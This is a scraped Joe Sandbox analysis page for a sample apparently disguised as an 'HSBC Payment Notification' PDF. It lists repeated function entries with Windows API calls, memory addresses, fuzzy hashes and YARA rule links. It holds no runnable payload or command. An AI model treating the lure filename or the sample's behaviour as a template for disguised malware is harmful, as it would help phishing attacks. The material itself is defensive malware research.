Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: 762733e25637bc439446b3da9c5912462bd92284ca480afd830ba0cdb0608b85
Instruction ID: c304d0e6e06ed5b692ae79d4b0fe9c52f6c8e6d6f1456e813eafe14ad56adccd
Opcode Fuzzy Hash: 762733e25637bc439446b3da9c5912462bd92284ca480afd830ba0cdb0608b85
Instruction Fuzzy Hash: F2114F71600109AFCB00FBA5D946CEE77B9EF04314B54847AF505B72A2DB389E14CB69

Function 00458B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00458B61
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458B73
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458B89
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458BA4

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: ca17c677d33199d8ade5de32726d6ec6320cad89c97852bedaa9fe676a546a7f
Instruction ID: 6d6e4feeaee75d02a1ec4dd614e497ad2765f264ac6e3ed00c825e9843e5ba14
Opcode Fuzzy Hash: ca17c677d33199d8ade5de32726d6ec6320cad89c97852bedaa9fe676a546a7f
Instruction Fuzzy Hash: 56113A79900218BFDB10DB95C884EAEBB78EB48710F2041A6E900B7250DA716E15DB94

Function 009D171B Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,009D0B68,00000000,00000000,?,009D16C2,009D0B68,00000000,00000000,00000000,?,009D1813,00000006,FlsSetValue), ref: 009D174D
GetLastError.KERNEL32(?,009D16C2,009D0B68,00000000,00000000,00000000,?,009D1813,00000006,FlsSetValue,009E5FC4,FlsSetValue,00000000,00000364,?,009D0EBD), ref: 009D1759
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,009D16C2,009D0B68,00000000,00000000,00000000,?,009D1813,00000006,FlsSetValue,009E5FC4,FlsSetValue,00000000), ref: 009D1767

Memory Dump Source

Source File: 00000001.00000002.1385260628.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: b3994a4feedd277b7f1b25eff4f19a86131dd7bb584991422a5d3747cc298f41
Instruction ID: 5993ae69d50ad9b446b3a1e015b0c7aa02fedff5edc24d55612b84d043e36647
Opcode Fuzzy Hash: b3994a4feedd277b7f1b25eff4f19a86131dd7bb584991422a5d3747cc298f41
Instruction Fuzzy Hash: A401A77769A223BBC7215A78EC88A66779CAF05BA17214623F915E7360D720DD00C6F0

Function 00466BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 00466BE6

Part of subcall function 004676C4: _memset.LIBCMT ref: 004676F9

_memmove.LIBCMT ref: 00466C09
_memset.LIBCMT ref: 00466C16
LeaveCriticalSection.KERNEL32(?), ref: 00466C26

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: edf19e1ede3b3e611382947217f22c9f8674c26c836af00265cbaa5f5bcd5e3d
Instruction ID: 06c116e41b1fbc97defe022da98efa456519ca017efd3746de7cd937a477406a
Opcode Fuzzy Hash: edf19e1ede3b3e611382947217f22c9f8674c26c836af00265cbaa5f5bcd5e3d
Instruction Fuzzy Hash: ACF0547A200110BBCF016F56EC85A8ABF29EF45325F4480A9FE085E227D775E811CBB9

Function 00402218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00402231
SetTextColor.GDI32(?,000000FF), ref: 0040223B
SetBkMode.GDI32(?,00000001), ref: 00402250
GetStockObject.GDI32(00000005), ref: 00402258
GetWindowDC.USER32(?,00000000), ref: 0043BE83
GetPixel.GDI32(00000000,00000000,00000000), ref: 0043BE90
GetPixel.GDI32(00000000,?,00000000), ref: 0043BEA9
GetPixel.GDI32(00000000,00000000,?), ref: 0043BEC2
GetPixel.GDI32(00000000,?,?), ref: 0043BEE2
ReleaseDC.USER32(?,00000000), ref: 0043BEED

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 1c24b0d26c008fe2912d49eeb423ba9ae618f885d5077ddc5dea034ec8dbd8ce
Instruction ID: 54194c7dea5641a5760446fc0b471bd43188e270dcc7ade6c1867ff591c8ccba
Opcode Fuzzy Hash: 1c24b0d26c008fe2912d49eeb423ba9ae618f885d5077ddc5dea034ec8dbd8ce
Instruction Fuzzy Hash: 8FE03932104244EADB215FA8EC4D7D93B10EB05332F10837AFB69980E187B54994DB16

Function 00458712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 0045871B
OpenThreadToken.ADVAPI32(00000000,?,?,?,004582E6), ref: 00458722
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,004582E6), ref: 0045872F
OpenProcessToken.ADVAPI32(00000000,?,?,?,004582E6), ref: 00458736

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: c13fcb7cbc4fcf9024c8800305f1294cb96d5ee06e78be5c1b908a636c14961a
Instruction ID: 27e516f12521b82670cd12e73380cd235ac9fe5f10b87aab6d4880cb8d6f589a
Opcode Fuzzy Hash: c13fcb7cbc4fcf9024c8800305f1294cb96d5ee06e78be5c1b908a636c14961a
Instruction Fuzzy Hash: 69E086366113119FD7205FB45D0CB5B3BACEF55792F244C3CB645D9051DA388449C754

Function 00406240 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON

Download Yara Rule

Strings

%I, xrefs: 0040624E

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID:
String ID: %I
API String ID: 0-63094095
Opcode ID: 7529cc8c48647e6d4a72391ec485b67292564c6fe3cbb07e68201f0b86d76f72
Instruction ID: fc9b66e0bafda5900f64632d1c19c64e360ede111f7e08ffc6918f9b7723571d
Opcode Fuzzy Hash: 7529cc8c48647e6d4a72391ec485b67292564c6fe3cbb07e68201f0b86d76f72
Instruction Fuzzy Hash: F7B19D759001099ACF24EF95C8819EEB7B5EF44314F11403BE942B72D1DB3C9AA6CB9E

Function 0047AEA2 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 313COMMON

Download Yara Rule

APIs

__itow_s.LIBCMT ref: 0047AFAE

Strings

xbL, xrefs: 0047B010
xbL, xrefs: 0047AFE4

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: __itow_s
String ID: xbL$xbL
API String ID: 3653519197-3351732020
Opcode ID: 90ba7ef9f8d9146918a72878262fd05d6879b866cf0277a0a7876aadaa269471
Instruction ID: dfe480003ad9fd5cab9b7df9ebde8448aad3da8901d64dd9d19fd2ed475b7079
Opcode Fuzzy Hash: 90ba7ef9f8d9146918a72878262fd05d6879b866cf0277a0a7876aadaa269471
Instruction Fuzzy Hash: DFB16E70A00105EFCB14DF55C890EEAB7B9EF58344F14C46AF949AB291EB38E941CB99

Function 00412957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00412968
GlobalMemoryStatusEx.KERNEL32(?), ref: 00412981

Strings

@, xrefs: 00412975

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: cf15a7ea090bffc9490279112080cc94ce2022ef9ba38fcf57aa55417a2360bc
Instruction ID: a5a81f9d260a569e77baff687d6fe7a0f73e349ca0d117409dcb6840122a66be
Opcode Fuzzy Hash: cf15a7ea090bffc9490279112080cc94ce2022ef9ba38fcf57aa55417a2360bc
Instruction Fuzzy Hash: CB5159B24187449BD320EF15D885BAFBBE8FB85344F41886DF2D8911A1DB74892CCB5A

Function 00440574 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0044057F

Strings

DdL, xrefs: 0040A151
DdL, xrefs: 0040A317

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: ClearVariant
String ID: DdL$DdL
API String ID: 1473721057-91670653
Opcode ID: 642cbb757c798b464e218aa70decae5e6efc434086f495e8bbeb8dcdbabf2780
Instruction ID: 8cf85b897da21b35b232154f37a53a393289a03a8f02d27ab87a98346ee69310
Opcode Fuzzy Hash: 642cbb757c798b464e218aa70decae5e6efc434086f495e8bbeb8dcdbabf2780
Instruction Fuzzy Hash: 5D5113B86043019FD754DF18C580A1ABBF1BF99344F54886EE9859B3A1D339EC91CF4A

Function 0047258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0047259E
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 004725D4

Strings

|, xrefs: 004725A5

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: 57f61fd01a308bda18669db1d90637b579712718f35f37a6001f1c43c21cdce8
Instruction ID: 4adfb47e446f893ace23fd506e663b8e952a67a31115c745ae406753cf5a670a
Opcode Fuzzy Hash: 57f61fd01a308bda18669db1d90637b579712718f35f37a6001f1c43c21cdce8
Instruction Fuzzy Hash: A5313871D00119ABCF11AFA1CC85EEEBFB8FF08344F10406AF918B6162DB756916DB65

Function 00486A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00486B17
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00486B53

Strings

static, xrefs: 00486AB3

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 352ac0ade79c08b1e3711c999f417e7e9207a04fdee643833d7e2eb5d5c32766
Instruction ID: c0acac3fdbca48a843832e92e86f2a53b54dc7fac4935119c3a772658612a1a1
Opcode Fuzzy Hash: 352ac0ade79c08b1e3711c999f417e7e9207a04fdee643833d7e2eb5d5c32766
Instruction Fuzzy Hash: B3318171100604AEDB10AF69CC41BFF73A9FF48754F11892EF9A5D7290DA34AC81CB68

Function 004628A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00462911
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0046294C

Strings

0, xrefs: 0046290A

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 91418dd9749d71d93997971e50ee6e89b8c3289f57ab89a5a78092f89cf02659
Instruction ID: 2b4b8058b7b01795732b14ccdc08f7f24d6d082f06cc36c2997a609d376c2748
Opcode Fuzzy Hash: 91418dd9749d71d93997971e50ee6e89b8c3289f57ab89a5a78092f89cf02659
Instruction Fuzzy Hash: BE31D871700705BBDB24DE48CE45BAFBBA4EF85350F14001AE881A6291E7B89948CB1B

Function 004866D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00486761
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0048676C

Strings

Combobox, xrefs: 0048672E

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 2599c693f4df458194b2d20bee318bb9363e3503390fb5a9e170622b8a8df8eb
Instruction ID: 7937b7f8ceb80f7c2640562fc72fb2af059ad44b1fd006181b112b31544ba688
Opcode Fuzzy Hash: 2599c693f4df458194b2d20bee318bb9363e3503390fb5a9e170622b8a8df8eb
Instruction Fuzzy Hash: 9111B271200208AFEF51AF54DC81EAF376AEB48368F21092AF91897390D6399C5197A8

Function 00486C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91

GetWindowRect.USER32(00000000,?), ref: 00486C71
GetSysColor.USER32(00000012), ref: 00486C8B

Strings

static, xrefs: 00486C4E

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 9c6eecc6bf7be964b917928501c6ce077e485374675d84249056efc255601d24
Instruction ID: 619ac3c59cbe9074ca3f8c975c7c8c691f8bfa66afa20d6a6bf36cd90ef0372b
Opcode Fuzzy Hash: 9c6eecc6bf7be964b917928501c6ce077e485374675d84249056efc255601d24
Instruction Fuzzy Hash: DC212CB2510209AFDF04EFA8CC45EEE7BA8FB08315F114A29FD55D2250D639E851DB64

Function 00486920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 004869A2
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004869B1

Strings

edit, xrefs: 00486986

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: dd0a91ca5e41458d40a7dd2483d9f0107040614a073402ee9870d4d63f33d5fa
Instruction ID: c4dc0b7ee3ea423f7e1eb401844c401eee0777dcbcb5b463cc5485c74a1bef4f
Opcode Fuzzy Hash: dd0a91ca5e41458d40a7dd2483d9f0107040614a073402ee9870d4d63f33d5fa
Instruction Fuzzy Hash: A711B2B1100104ABEF506F68DC40EEF3769EB05378F614B29F964972E0C739DC919758

Function 004629AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00462A22
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00462A41

Strings

0, xrefs: 00462A18

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

